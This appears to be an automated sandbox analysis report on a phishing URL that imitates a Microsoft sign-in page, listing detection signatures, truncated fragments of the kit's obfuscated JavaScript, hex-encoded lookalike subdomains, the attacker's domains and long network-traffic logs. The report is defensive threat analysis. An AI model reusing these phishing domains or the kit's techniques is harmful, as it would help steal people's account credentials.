Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com

Overview

General Information

Sample URL:https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com
Analysis ID:1576856

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish45
Yara detected HtmlPhish54
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Performs DNS queries with encoded ASCII data (may be used to data exfiltration)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Javascript checks online IP of machine
Stores files to the Windows start menu directory
URL contains potential PII (phishing indication)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1968,i,17634273882530886685,6657441781872609284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6248 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.12.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    0.18.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      2.5.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        3.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          3.6.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Click to see the 3 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comAvira URL Cloud: detection malicious, Label: malware

            Phishing

            barindex
            Source: Yara matchFile source: 3.10.pages.csv, type: HTML
            Source: Yara matchFile source: 0.12.id.script.csv, type: HTML
            Source: Yara matchFile source: 0.18.id.script.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 3.7.pages.csv, type: HTML
            Source: Yara matchFile source: 3.6.pages.csv, type: HTML
            Source: Yara matchFile source: 3.8.pages.csv, type: HTML
            Source: Yara matchFile source: 3.10.pages.csv, type: HTML
            Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators.
            Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the script, suggests this is a highly suspicious and potentially malicious piece of code.
            Source: 1.8..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://enrollmentportal.borlsfx.com/2e1145bcea/st... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the functionality may be legitimate (e.g., analytics, error reporting), the overall level of suspicious activity is concerning and requires further investigation.
            Source: 0.18.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://login.borlsfx.com/844b56ecfd?nxx=766771764... This script exhibits several high-risk behaviors, including:- Dynamic code execution through the use of obfuscated URLs and encoded strings, which could be used to execute remote or malicious code.- Data exfiltration by sending user data (potentially including sensitive information like cookies or session identifiers) to external, untrusted domains.- Redirects to suspicious domains, which could be used for phishing or other malicious activities.The combination of these high-risk indicators suggests this script is likely malicious and poses a significant security risk.
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comHTTP Parser: (function(_0x1271a3,_0x4facb2){function _0x365db6(_0x526545,_0x13d38b,_0x26a4c1,_0x29a5c6){return _0
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comHTTP Parser: (function(_0x1271a3,_0x4facb2){function _0x365db6(_0x526545,_0x13d38b,_0x26a4c1,_0x29a5c6){return _0
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comHTTP Parser: (function(_0x254620,_0xf9497b){const _0x520f86=_0x254620();function _0xefca25(_0x4dee07,_0x25f4c7,_0
            Source: https://login.borlsfx.com/7102f140f4/f9075051.jsHTTP Parser: (function(_0x4c6a3f,_0x14692b){const _0x22897e=_0x463a,_0x42fa82=_0x4c6a3f();while(!![]){try{const _
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: (function(_0x130c11,_0x411225){function _0x5df237(_0x5c4e9d,_0x33e339,_0x246e8b,_0x6a6d38){return _0
            Source: https://login.borlsfx.com/7102f140f4/b4801717.jsHTTP Parser: function _0x2725(_0x5d057d,_0x204210){const _0x11ad5b=_0x11ad();return _0x2725=function(_0x2725ca,_0
            Source: https://706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com/7102f140f4/d15cfc1a.jsHTTP Parser: function _0x3d3c(){const _0x5112c9=['HTMLFormElement','arrayEquals','URL','length','constructor','st
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4dHTTP Parser: Number of links: 0
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: Number of links: 0
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comHTTP Parser: Base64 decoded: 1734451314.000000
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4dHTTP Parser: Title: Redirecting does not match URL
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: Title: Communication does not match URL
            Source: https://enrollmentportal.borlsfx.com/2e1145bcea/start?for=/rwrzvvwfa/d8b09a/HTTP Parser: function _0xe53c(_0x2dcf91,_0x13971e){const _0x11d5ef=_0x11d5();return _0xe53c=function(_0xe53ca8,_0x2a919c){_0xe53ca8=_0xe53ca8-0x1b8;let _0x5b3903=_0x11d5ef[_0xe53ca8];return _0x5b3903;},_0xe53c(_0x2dcf91,_0x13971e);}function _0x11d5(){const _0x2916dc=['backgroundimage','report','value','1681180kehpkx','getbased','then','back','invisible','device','will\x20submit','charcodeat','getdomain','foreach','.device','botdetected','detach','items','string','unknown\x20browser','decode','getelementsbyname','4708218bvhgdv','submit','none','119pftemp','decodebased','\x27\x20occured\x20at\x20\x27','removechild','#igp','error\x20\x27','url(','floor','arraybuffer','reason','trim','https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png','post','getuser','getemail','branding\x20url\x20not\x20defined','loading...','parse','16avgexk','<i\x20class=\x22far\x20fa-calendar-alt\x20icon\x22></i>','failure','object','split','11tynrdt','pow','.browser','type','src','push','apply','prot...
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comSample URL: PII: test@test.com
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: Iframe src: https://706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com/Prefetch/Prefetch.aspx
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: Iframe src: https://706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com/Prefetch/Prefetch.aspx
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: Iframe src: https://706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com/Prefetch/Prefetch.aspx
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4dHTTP Parser: No favicon
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: No favicon
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: No favicon
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4dHTTP Parser: No <meta name="author".. found
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4dHTTP Parser: No <meta name="copyright".. found
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49793 version: TLS 1.2

            Networking

            barindex
            Source: unknownDNS traffic detected with encoded ASCII: query: 706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com; decoded parts: portal.microsoftonline.com
            Source: unknownDNS traffic detected with encoded ASCII: query: 706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com; decoded parts: portal.microsoftonline.com
            Source: unknownDNS traffic detected with encoded ASCII: query: 706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com; decoded parts: portal.microsoftonline.com
            Source: unknownDNS traffic detected with encoded ASCII: query: 706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com; decoded parts: portal.microsoftonline.com
            Source: unknownDNS traffic detected with encoded ASCII: query: 707269766163792e6d6963726f736f66742e636f6d.borlsfx.com; decoded parts: privacy.microsoft.com
            Source: unknownDNS traffic detected with encoded ASCII: query: 707269766163792e6d6963726f736f66742e636f6d.borlsfx.com; decoded parts: privacy.microsoft.com
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: global trafficDNS traffic detected: DNS query: enrollmentportal.borlsfx.com
            Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
            Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: meta.wikimedia.org
            Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: cdn4.iconfinder.com
            Source: global trafficDNS traffic detected: DNS query: ipapi.co
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: login.borlsfx.com
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
            Source: global trafficDNS traffic detected: DNS query: 706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com
            Source: global trafficDNS traffic detected: DNS query: 707269766163792e6d6963726f736f66742e636f6d.borlsfx.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
